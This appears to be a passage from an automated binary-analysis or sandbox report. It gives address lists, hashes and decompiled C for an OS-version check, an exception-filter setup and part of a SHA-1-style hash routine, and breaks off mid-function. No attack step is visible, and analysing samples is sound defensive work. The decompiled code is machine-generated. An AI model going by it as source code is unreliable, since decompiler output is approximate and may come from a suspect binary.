                                        0x00410140
                                        0x00410140
                                        0x00410142
                                        0x00000000
                                        0x00000000
                                        0x00410148
                                        0x0041014b
                                        0x0041014d
                                        0x0041014f
                                        0x00410150
                                        0x00410153
                                        0x00410155
                                        0x00410158
                                        0x0041015c
                                        0x0041015d
                                        0x00410161
                                        0x00410163
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00410163
                                        0x00000000
                                        0x00410140
                                        0x00410138
                                        0x00000000
                                        0x00000000
                                        0x00410186
                                        0x00410186
                                        0x0041018a
                                        0x0041018c
                                        0x00000000
                                        0x00410192
                                        0x00410192
                                        0x00410196
                                        0x00410198
                                        0x0041019b
                                        0x0041019d
                                        0x004101ed
                                        0x004101f1
                                        0x004101f1
                                        0x004101f3
                                        0x004101f7
                                        0x00000000
                                        0x0041019f
                                        0x0041019f
                                        0x004101a1
                                        0x004101a4
                                        0x004101c5
                                        0x004101c5
                                        0x004101c8
                                        0x004101ca
                                        0x004101db
                                        0x004101dd
                                        0x004101dd
                                        0x004101cc
                                        0x004101cc
                                        0x004101d1
                                        0x004101d4
                                        0x004101d4
                                        0x004101e0
                                        0x004101e4
                                        0x004101e7
                                        0x004101e9
                                        0x004101fa
                                        0x004101fa
                                        0x004101fa
                                        0x004101fc
                                        0x00410200
                                        0x00410202
                                        0x00410202
                                        0x00410206
                                        0x0041020a
                                        0x0041020c
                                        0x00410210
                                        0x00410213
                                        0x00410217
                                        0x00410217
                                        0x00410220
                                        0x00410220
                                        0x00410223
                                        0x00410225
                                        0x00410226
                                        0x00410226
                                        0x00410226
                                        0x00410229
                                        0x0041022d
                                        0x00410231
                                        0x00410235
                                        0x00410238
                                        0x0041023e
                                        0x0041023e
                                        0x0040f846
                                        0x0040f846
                                        0x004101a6
                                        0x004101a6
                                        0x004101ad
                                        0x00000000
                                        0x004101af
                                        0x004101af
                                        0x004101b3
                                        0x004101ba
                                        0x004101ba
                                        0x004101ad
                                        0x004101a4
                                        0x00000000
                                        0x0041019d
                                        0x00000000
                                        0x00000000
                                        0x00410249
                                        0x0041024e
                                        0x00000000
                                        0x00410254
                                        0x00410254
                                        0x00410258
                                        0x0041025b
                                        0x0041025f
                                        0x00410263
                                        0x00410265
                                        0x00410269
                                        0x00000000
                                        0x00410269
                                        0x00000000
                                        0x00000000
                                        0x00410274
                                        0x00410278
                                        0x00410279
                                        0x0041027b
                                        0x0041027d
                                        0x0041027d
                                        0x0041027d
                                        0x00000000
                                        0x0041034c
                                        0x00410350
                                        0x004103cc
                                        0x004103cc
                                        0x00000000
                                        0x00410352
                                        0x00410352
                                        0x00410356
                                        0x00000000
                                        0x00410358
                                        0x00410358
                                        0x0041035b
                                        0x00410383
                                        0x00410383
                                        0x00410386
                                        0x004103c4
                                        0x004103c6
                                        0x004103c6
                                        0x004103c8
                                        0x00000000
                                        0x00410388
                                        0x00410388
                                        0x0041038c
                                        0x00410393
                                        0x00000000
                                        0x00410393
                                        0x00410360
                                        0x00410360
                                        0x00410360
                                        0x00410362
                                        0x00000000
                                        0x00000000
                                        0x00410368
                                        0x0041036b
                                        0x0041036d
                                        0x0041036f
                                        0x00410370
                                        0x00410372
                                        0x00410376
                                        0x00410379
                                        0x0041037d
                                        0x0041037e
                                        0x00410381
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00410381
                                        0x00000000
                                        0x00410360
                                        0x0041035b
                                        0x00410356
                                        0x00000000
                                        0x00000000
                                        0x004103d2
                                        0x004103d2
                                        0x00000000
                                        0x00000000
                                        0x004103df
                                        0x0040f401
                                        0x0040f401
                                        0x0040f405
                                        0x0040f405
                                        0x0040f409
                                        0x0040f409
                                        0x0040f411
                                        0x0040f415
                                        0x0040f41c
                                        0x0040f423
                                        0x0040f426
                                        0x0040f42a
                                        0x0040f42c
                                        0x0040f430
                                        0x0040f433
                                        0x0040f436
                                        0x0040f45a
                                        0x0040f464
                                        0x0040f469
                                        0x0040f46c
                                        0x0040f46e
                                        0x00410407
                                        0x00000000
                                        0x0040f474
                                        0x0040f474
                                        0x00000000
                                        0x0040f474
                                        0x0040f438
                                        0x0040f438
                                        0x0040f43b
                                        0x0041040b
                                        0x0041040f
                                        0x00410412
                                        0x00410415
                                        0x00410418
                                        0x0041041b
                                        0x0041041e
                                        0x00410422
                                        0x00410426
                                        0x00410464
                                        0x00410464
                                        0x00410428
                                        0x00410428
                                        0x0041042a
                                        0x00000000
                                        0x0041042c
                                        0x0041042f
                                        0x00410432
                                        0x00410436
                                        0x00410437
                                        0x0041043a
                                        0x00410450
                                        0x00410455
                                        0x00410459
                                        0x0041045c
                                        0x0041045f
                                        0x0041043c
                                        0x0041043c
                                        0x00410441
                                        0x00410445
                                        0x00410448
                                        0x0041044b
                                        0x0041044b
                                        0x0041043a
                                        0x0041042a
                                        0x00410468
                                        0x0041046a
                                        0x0041046d
                                        0x00410478
                                        0x00410478
                                        0x0041046f
                                        0x0041046f
                                        0x00410472
                                        0x00000000
                                        0x00410474
                                        0x00410474
                                        0x00410474
                                        0x00410472
                                        0x00410482
                                        0x0041049c
                                        0x004104a1
                                        0x004104a4
                                        0x004104aa
                                        0x004104aa
                                        0x004104af
                                        0x004104d5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004104a6
                                        0x004104a6
                                        0x004104a8
                                        0x004104b1
                                        0x004104b1
                                        0x004104b5
                                        0x004104b7
                                        0x00000000
                                        0x004104bd
                                        0x004104c9
                                        0x004104c9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004104a8
                                        0x0040f441
                                        0x0040f441
                                        0x0040f443
                                        0x0040f446
                                        0x00000000
                                        0x0040f44c
                                        0x0040f44c
                                        0x0040f44f
                                        0x00000000
                                        0x0040f451
                                        0x0040f451
                                        0x0040f454
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040f454
                                        0x0040f44f
                                        0x0040f446
                                        0x0040f43b
                                        0x00000000
                                        0x00000000
                                        0x0040f47a
                                        0x0040f47a
                                        0x0040f47f
                                        0x0040f486
                                        0x00000000
                                        0x00000000
                                        0x0040f84a
                                        0x0040f84a
                                        0x0040f84c
                                        0x00000000
                                        0x0040ef30
                                        0x0040ef1a
                                        0x0040eeb9
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID: L@A
                                        • API String ID: 0-2003014581
                                        • Opcode ID: 34a425d6565ff4c0cda44dbc0f6b1d3df7c0d6630035606a97b9d793ee918520
                                        • Instruction ID: 45b0b9297e89ea432eb74700d4486bcee3f234638abdc61ccaa602107dde247f
                                        • Opcode Fuzzy Hash: 34a425d6565ff4c0cda44dbc0f6b1d3df7c0d6630035606a97b9d793ee918520
                                        • Instruction Fuzzy Hash: 7F429FB16043029FD728CF29C48075BBBE1BF94304F14467EE8549BB82D379E99ACB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405573, Relevance: 3.1, APIs: 2, Instructions: 128COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E00405573() {
				void* _v2;
				struct _OSVERSIONINFOW _v284;
				char _v286;
				intOrPtr _v560;
				intOrPtr _v564;
				char _v568;
				struct _OSVERSIONINFOW _v844;
				void* _t18;
				intOrPtr _t19;
				signed int _t25;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t36;
				void* _t37;
				void* _t38;
				void* _t40;
				signed int _t56;
				void* _t63;

				_v844.dwOSVersionInfoSize = 0x114;
				_t40 = 0xc8;
				_t25 = 0;
				_t32 = 0;
				if(GetVersionExW( &_v844) == 0) {
					L39:
					return _t40;
				}
				_t18 = _v844.dwPlatformId - 1;
				if(_t18 == 0) {
					_t19 = _v844.dwMinorVersion;
					if(_t19 == 0) {
						_push(0xa);
						L38:
						_pop(_t40);
						goto L39;
					}
					if(_t19 == 0xa) {
						_push(0x1e);
						goto L38;
					}
					if(_t19 != 0x5a) {
						goto L39;
					}
					_push(0x28);
					goto L38;
				}
				if(_t18 != 1) {
					goto L39;
				}
				_t56 = 0;
				if(E0040552C( &_v568) == 0) {
					_v284.dwOSVersionInfoSize = 0x11c;
					if(GetVersionExW( &_v284) == 0) {
						goto L9;
					} else {
						_t25 = _v844.dwMajorVersion;
						_t32 = _v844.dwMinorVersion;
						goto L7;
					}
				} else {
					_t25 = _v564;
					_t32 = _v560;
					_t63 = _v286 - 1;
					L7:
					if(_t63 == 0) {
						_t56 = 1;
					}
					L9:
					_t26 = _t25 - 3;
					if(_t26 == 0) {
						_push(5);
						goto L38;
					}
					_t27 = _t26 - 1;
					if(_t27 == 0) {
						_push(0x14);
						goto L38;
					}
					_t28 = _t27 - 1;
					if(_t28 == 0) {
						_t33 = _t32;
						if(_t33 == 0) {
							_push(0x32);
							goto L38;
						}
						_t34 = _t33 - 1;
						if(_t34 == 0) {
							_push(0x3c);
							goto L38;
						}
						if(_t34 == 1) {
							asm("sbb esi, esi");
							_t40 = ( ~_t56 & 0xfffffffb) + 0x41;
						}
						goto L39;
					}
					_t29 = _t28 - 1;
					if(_t29 == 0) {
						_t36 = _t32;
						if(_t36 == 0) {
							asm("sbb esi, esi");
							_t40 = ( ~_t56 & 0xfffffffb) + 0x4b;
						} else {
							_t37 = _t36 - 1;
							if(_t37 == 0) {
								asm("sbb esi, esi");
								_t40 = ( ~_t56 & 0xfffffffb) + 0x55;
							} else {
								_t38 = _t37 - 1;
								if(_t38 == 0) {
									asm("sbb esi, esi");
									_t40 = ( ~_t56 & 0xfffffffb) + 0x5f;
								} else {
									if(_t38 == 1) {
										asm("sbb esi, esi");
										_t40 = ( ~_t56 & 0xfffffffb) + 0x69;
									}
								}
							}
						}
						goto L39;
					}
					if(_t29 != 4 || _t32 != 0) {
						goto L39;
					} else {
						_push(0x6e);
						goto L38;
					}
				}
			}


























                                        0x00405581
                                        0x0040558a
                                        0x0040558f
                                        0x00405591
                                        0x0040559b
                                        0x004056cc
                                        0x004056d7
                                        0x004056d7
                                        0x004055a5
                                        0x004055a6
                                        0x004056ae
                                        0x004056b4
                                        0x004056c8
                                        0x004056ca
                                        0x004056ca
                                        0x00000000
                                        0x004056ca
                                        0x004056b9
                                        0x004056c4
                                        0x00000000
                                        0x004056c4
                                        0x004056be
                                        0x00000000
                                        0x00000000
                                        0x004056c0
                                        0x00000000
                                        0x004056c0
                                        0x004055ad
                                        0x00000000
                                        0x00000000
                                        0x004055ba
                                        0x004055c5
                                        0x004055e6
                                        0x004055fa
                                        0x00000000
                                        0x004055fc
                                        0x004055fc
                                        0x00405600
                                        0x00000000
                                        0x00405604
                                        0x004055c7
                                        0x004055c7
                                        0x004055ce
                                        0x004055d5
                                        0x0040560c
                                        0x0040560c
                                        0x00405610
                                        0x00405610
                                        0x00405611
                                        0x00405611
                                        0x00405614
                                        0x004056aa
                                        0x00000000
                                        0x004056aa
                                        0x0040561a
                                        0x0040561b
                                        0x004056a6
                                        0x00000000
                                        0x004056a6
                                        0x00405621
                                        0x00405622
                                        0x00405685
                                        0x00405688
                                        0x004056a2
                                        0x00000000
                                        0x004056a2
                                        0x0040568a
                                        0x0040568b
                                        0x0040569e
                                        0x00000000
                                        0x0040569e
                                        0x0040568e
                                        0x00405694
                                        0x00405699
                                        0x00405699
                                        0x00000000
                                        0x0040568e
                                        0x00405624
                                        0x00405625
                                        0x0040563f
                                        0x00405642
                                        0x0040567b
                                        0x00405680
                                        0x00405644
                                        0x00405644
                                        0x00405645
                                        0x0040566d
                                        0x00405672
                                        0x00405647
                                        0x00405647
                                        0x00405648
                                        0x0040565f
                                        0x00405664
                                        0x0040564a
                                        0x0040564b
                                        0x00405651
                                        0x00405656
                                        0x00405656
                                        0x0040564b
                                        0x00405648
                                        0x00405645
                                        0x00000000
                                        0x00405642
                                        0x0040562a
                                        0x00000000
                                        0x00405638
                                        0x00405638
                                        0x00000000
                                        0x00405638
                                        0x0040562a

                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 00405593
                                          • Part of subcall function 0040552C: memset.MSVCRT ref: 0040553B
                                          • Part of subcall function 0040552C: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                                          • Part of subcall function 0040552C: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                                        • GetVersionExW.KERNEL32(?), ref: 004055F2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Version$AddressHandleModuleProcmemset
                                        • String ID:
                                        • API String ID: 3445250173-0
                                        • Opcode ID: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
                                        • Instruction ID: 26d0d35871443cf73a281a40cb18e3271032821f4299fa5ffe9ef0f91627ffe6
                                        • Opcode Fuzzy Hash: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
                                        • Instruction Fuzzy Hash: 9B31BF32924F1882D23085648D45BB76AA4E751760FD90F37DD9EB72E0D23F8D458D8E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409F50, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00409F50(_Unknown_base(*)()* _a4) {
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;

				 *0x418150 = _a4;
				_a4 = E00409F10;
				_t6 = _a4;
				if(_t6 == 0) {
					_t7 = SetUnhandledExceptionFilter( *0x418158);
					 *0x418158 = 0;
					return _t7;
				} else {
					if( *0x418158 != 0) {
						_a4 = _t6;
						goto ( *0x417574);
					}
					_t8 = SetUnhandledExceptionFilter(_t6);
					 *0x418158 = _t8;
					return _t8;
				}
			}






                                        0x00409f54
                                        0x00409f59
                                        0x0040a070
                                        0x0040a076
                                        0x0040a0a0
                                        0x0040a0a6
                                        0x0040a0b0
                                        0x0040a078
                                        0x0040a07f
                                        0x0040a081
                                        0x0040a085
                                        0x0040a085
                                        0x0040a08c
                                        0x0040a092
                                        0x0040a097
                                        0x0040a097

                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00409F10,00401180,00000000,00000000,00000001,00000004,00000000,00417060,00000008,0000000C,000186A1,00000007,00417070,004180F0,00000004,00000000), ref: 0040A08C
                                        • SetUnhandledExceptionFilter.KERNEL32(00401180,00000000,00000000,00000001,00000004,00000000,00417060,00000008,0000000C,000186A1,00000007,00417070,004180F0,00000004,00000000,00417060), ref: 0040A0A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 77079db996cd660077cc46ba4a7e67c55223caa75486584a9b8db1cd80bb7e02
                                        • Instruction ID: 89272a9d9fb70ec8c966eec723b627947422120b1b95ac09037bc255c720a398
                                        • Opcode Fuzzy Hash: 77079db996cd660077cc46ba4a7e67c55223caa75486584a9b8db1cd80bb7e02
                                        • Instruction Fuzzy Hash: 68E0C2B2908380FFC3108F20E94C68B7BF4B785741F00C93EA845923A0CB348852DB1E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B967, Relevance: 2.9, APIs: 1, Instructions: 1619COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E0040B967() {
				void* _t659;
				void* _t660;
				signed int _t795;
				signed int _t804;
				signed int* _t809;
				signed int _t814;
				signed int _t819;
				signed int* _t824;
				signed int* _t828;
				signed int* _t832;
				signed int* _t836;
				signed int* _t841;
				signed int* _t845;
				signed int* _t849;
				signed int* _t853;
				signed int* _t858;
				signed int* _t862;
				signed int* _t866;
				signed int _t873;
				signed int _t881;
				signed int* _t885;
				signed int _t889;
				signed int _t894;
				signed int _t899;
				signed int _t903;
				signed int _t907;
				signed int _t911;
				signed int _t915;
				signed int _t919;
				signed int _t923;
				signed int _t927;
				signed int _t931;
				signed int _t935;
				signed int _t939;
				signed int _t943;
				signed int _t947;
				signed int _t953;
				signed int _t957;
				signed int _t961;
				signed int _t964;
				signed int _t966;
				signed int* _t969;
				signed int* _t972;
				signed int _t978;
				signed int _t984;
				signed int _t990;
				signed int _t996;
				signed int* _t997;
				signed int* _t1003;
				signed int* _t1009;
				signed int _t1018;
				signed int _t1025;
				signed int* _t1026;
				signed int _t1032;
				signed int _t1038;
				signed int* _t1044;
				signed int* _t1050;
				signed int* _t1056;
				signed int* _t1062;
				signed int* _t1068;
				signed int* _t1074;
				signed int* _t1080;
				signed int _t1089;
				void* _t1094;
				signed int _t1097;
				signed int _t1099;
				signed int _t1100;
				signed int _t1103;
				signed int _t1106;
				signed int _t1107;
				signed int _t1109;
				signed int _t1111;
				signed int _t1113;
				signed int* _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1123;
				signed int _t1125;
				signed int _t1126;
				signed int _t1127;
				signed int _t1132;
				signed int _t1134;
				signed int _t1197;
				signed int* _t1225;
				signed int* _t1229;
				signed int* _t1235;
				signed int* _t1238;
				void* _t1243;
				signed int _t1246;
				void* _t1249;
				signed int _t1252;
				void* _t1255;
				signed int _t1258;
				void* _t1261;
				signed int _t1264;
				void* _t1267;
				signed int _t1270;
				void* _t1273;
				signed int* _t1274;
				signed int* _t1277;
				signed int _t1281;
				void* _t1284;
				signed int _t1286;
				signed int* _t1289;
				signed int* _t1296;
				signed int* _t1303;
				signed int* _t1310;
				signed int* _t1317;
				signed int* _t1324;
				signed int* _t1331;
				signed int* _t1338;
				signed int* _t1345;
				signed int* _t1352;
				signed int* _t1359;
				signed int _t1369;
				signed int* _t1376;
				signed int* _t1380;
				signed int _t1387;
				signed int _t1394;
				signed int* _t1401;
				signed int* _t1408;
				signed int* _t1428;
				signed int* _t1430;
				signed int* _t1432;
				signed int* _t1435;
				void* _t1438;
				signed int _t1439;
				signed int* _t1440;
				signed int _t1445;
				signed int* _t1448;
				signed int* _t1458;
				intOrPtr* _t1461;
				signed int* _t1462;
				signed int _t1465;
				signed int _t1466;
				signed int _t1470;
				signed int _t1473;
				signed int _t1477;
				signed int _t1481;
				signed int _t1485;
				signed int _t1488;
				signed int _t1492;
				signed int _t1497;
				signed int _t1502;
				signed int _t1506;
				signed int _t1510;
				signed int _t1514;
				signed int _t1518;
				signed int _t1522;
				signed int _t1526;
				signed int _t1530;
				signed int _t1534;
				signed int _t1538;
				signed int _t1542;
				signed int _t1546;
				void* _t1549;
				signed int _t1553;
				signed int _t1557;
				signed int _t1561;
				signed int* _t1573;
				signed int* _t1577;
				signed int* _t1579;
				signed int _t1588;
				signed int _t1592;
				signed int _t1596;
				signed int _t1600;
				signed int* _t1602;
				signed int _t1606;
				signed int _t1610;
				signed int _t1614;
				signed int _t1616;
				signed int _t1620;
				signed int _t1624;
				signed int _t1628;
				signed int _t1632;
				signed int _t1637;
				signed int _t1642;
				signed int _t1646;
				signed int _t1650;
				signed int _t1654;
				signed int _t1658;
				void* _t1660;
				signed int _t1662;
				signed int _t1664;
				signed int _t1665;
				signed int _t1669;
				signed int _t1672;
				signed int _t1675;
				signed int _t1678;
				signed int _t1679;
				signed int _t1681;
				signed int _t1683;
				signed int _t1685;
				signed int* _t1687;
				signed int _t1688;
				signed int _t1689;
				signed int _t1690;
				signed int _t1691;
				signed int _t1692;
				signed int _t1693;
				signed int _t1695;
				signed int _t1697;
				signed int _t1699;
				signed int* _t1700;
				signed int _t1702;
				signed int _t1704;
				signed int _t1707;
				signed int _t1709;
				signed int _t1710;
				signed int _t1712;
				signed int _t1715;
				signed int _t1716;
				signed int _t1718;
				signed int _t1720;
				signed int _t1722;
				signed int _t1724;
				signed int _t1729;
				signed int _t1733;
				signed int _t1737;
				signed int _t1741;
				signed int _t1745;
				signed int _t1749;
				signed int _t1753;
				signed int _t1757;
				signed int _t1761;
				signed int _t1765;
				signed int _t1769;
				signed int _t1773;
				signed int _t1777;
				signed int _t1781;
				signed int _t1785;
				signed int _t1789;
				signed int _t1793;
				signed int _t1797;
				signed int _t1801;
				signed int _t1803;
				signed int _t1804;
				signed int _t1805;
				signed int _t1808;
				signed int _t1810;
				signed int _t1813;
				signed int _t1815;
				signed int _t1816;
				signed int _t1819;
				signed int _t1822;
				signed int _t1823;
				signed int _t1824;
				signed int _t1825;
				signed int _t1827;
				signed int _t1828;
				signed int _t1829;
				signed int _t1830;
				signed int _t1831;
				signed int _t1833;
				signed int _t1835;
				signed int _t1838;
				signed int _t1840;
				signed int _t1842;
				signed int _t1844;
				signed int _t1846;
				void* _t1849;

				_t659 =  *(_t1849 + 0xc);
				if(_t659 == 0) {
					_t660 =  *(_t1849 + 0x54);
					 *(_t1849 + 0x58) = _t660;
				} else {
					memcpy(_t659,  *(_t1849 + 0x58), 0x40);
					_t660 =  *(_t1849 + 0x64);
					_t1849 = _t1849 + 0xc;
				}
				_t1462 =  *(_t1849 + 0x50);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x3c) =  *_t660 & 0xff00ff00 |  *_t660 & 0x00ff00ff;
				_t1097 = _t1462[1];
				_t1813 =  *_t1462;
				asm("rol ecx, 0x5");
				_t1707 = _t1462[3];
				_t1662 = _t1462[2];
				asm("ror ebx, 0x2");
				_t1465 = _t1462[4] + 0x5a827999 + ((_t1707 ^ _t1662) & _t1097 ^ _t1707) + _t1813 +  *(_t1849 + 0x44);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x50) = ( *(_t1849 + 0x68))[1] & 0xff00ff00 | ( *(_t1849 + 0x68))[1] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1709 = _t1707 + 0x5a827999 + ((_t1662 ^ _t1097) & _t1813 ^ _t1662) + _t1465 +  *(_t1849 + 0x50);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x38) = ( *(_t1849 + 0x68))[2] & 0xff00ff00 | ( *(_t1849 + 0x68))[2] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t1664 = _t1662 + 0x5a827999 + ((_t1097 ^ _t1813) & _t1465 ^ _t1097) + _t1709 +  *(_t1849 + 0x38);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x14) = ( *(_t1849 + 0x68))[3] & 0xff00ff00 | ( *(_t1849 + 0x68))[3] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror esi, 0x2");
				_t1099 = _t1097 + 0x5a827999 + ((_t1465 ^ _t1813) & _t1709 ^ _t1813) + _t1664 +  *(_t1849 + 0x14);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x10) = ( *(_t1849 + 0x68))[4] & 0xff00ff00 | ( *(_t1849 + 0x68))[4] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1815 = _t1813 + 0x5a827999 + ((_t1465 ^ _t1709) & _t1664 ^ _t1465) + _t1099 +  *(_t1849 + 0x10);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x3c) = ( *(_t1849 + 0x68))[5] & 0xff00ff00 | ( *(_t1849 + 0x68))[5] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1466 = _t1465 + ((_t1709 ^ _t1664) & _t1099 ^ _t1709) + _t1815 + 0x5a827999 +  *(_t1849 + 0x3c);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x40) = ( *(_t1849 + 0x68))[6] & 0xff00ff00 | ( *(_t1849 + 0x68))[6] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1710 = _t1709 + ((_t1664 ^ _t1099) & _t1815 ^ _t1664) + _t1466 + 0x5a827999 +  *(_t1849 + 0x40);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x44) = ( *(_t1849 + 0x68))[7] & 0xff00ff00 | ( *(_t1849 + 0x68))[7] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t1665 = _t1664 + ((_t1099 ^ _t1815) & _t1466 ^ _t1099) + _t1710 + 0x5a827999 +  *(_t1849 + 0x44);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x1c) = ( *(_t1849 + 0x68))[8] & 0xff00ff00 | ( *(_t1849 + 0x68))[8] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror esi, 0x2");
				_t1100 = _t1099 + ((_t1466 ^ _t1815) & _t1710 ^ _t1815) + _t1665 + 0x5a827999 +  *(_t1849 + 0x1c);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x18) = ( *(_t1849 + 0x68))[9] & 0xff00ff00 | ( *(_t1849 + 0x68))[9] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1816 = _t1815 + ((_t1466 ^ _t1710) & _t1665 ^ _t1466) + _t1100 + 0x5a827999 +  *(_t1849 + 0x18);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x20) = ( *(_t1849 + 0x68))[0xa] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xa] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1197 = _t1816 +  *(_t1849 + 0x20) + ((_t1710 ^ _t1665) & _t1100 ^ _t1710) + _t1466 + 0x5a827999;
				 *(_t1849 + 0x34) = _t1197;
				asm("rol ecx, 0x5");
				 *(_t1849 + 0x30) = _t1100;
				asm("ror edx, 0x8");
				asm("rol eax, 0x8");
				_t1470 = ( *(_t1849 + 0x68))[0xb] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xb] & 0x00ff00ff;
				 *(_t1849 + 0x48) = _t1470;
				asm("ror ebp, 0x2");
				 *(_t1849 + 0x54) = _t1816;
				_t1473 = _t1470 + _t1197 + ((_t1665 ^ _t1100) & _t1816 ^ _t1665) + _t1710 + 0x5a827999;
				_t1712 =  *(_t1849 + 0x34);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x24) = ( *(_t1849 + 0x68))[0xc] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xc] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				_t1103 = (_t1100 ^ (_t1100 ^ _t1816) & _t1712) + _t1473 +  *(_t1849 + 0x24) + _t1665 + 0x5a827999;
				asm("ror esi, 0x2");
				 *(_t1849 + 0x34) = _t1712;
				asm("rol ecx, 0x5");
				asm("rol eax, 0x8");
				asm("ror edi, 0x8");
				_t1669 = ( *(_t1849 + 0x68))[0xd] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xd] & 0x00ff00ff;
				 *(_t1849 + 0x28) = _t1669;
				asm("ror edx, 0x2");
				 *(_t1849 + 0x58) = _t1473;
				_t1819 = (_t1816 ^ (_t1712 ^ _t1816) & _t1473) + _t1103 + _t1669 +  *(_t1849 + 0x30) + 0x5a827999;
				asm("rol ecx, 0x5");
				asm("rol eax, 0x8");
				asm("ror edi, 0x8");
				_t1672 = ( *(_t1849 + 0x68))[0xe] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xe] & 0x00ff00ff;
				 *(_t1849 + 0x2c) = _t1672;
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x54) = _t1103;
				_t1715 = (_t1712 ^ (_t1712 ^ _t1473) & _t1103) + _t1819 + _t1672 +  *(_t1849 + 0x54) + 0x5a827999;
				asm("ror edi, 0x8");
				asm("rol eax, 0x8");
				_t1675 = ( *(_t1849 + 0x68))[0xf] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xf] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				 *(_t1849 + 0x30) = _t1675;
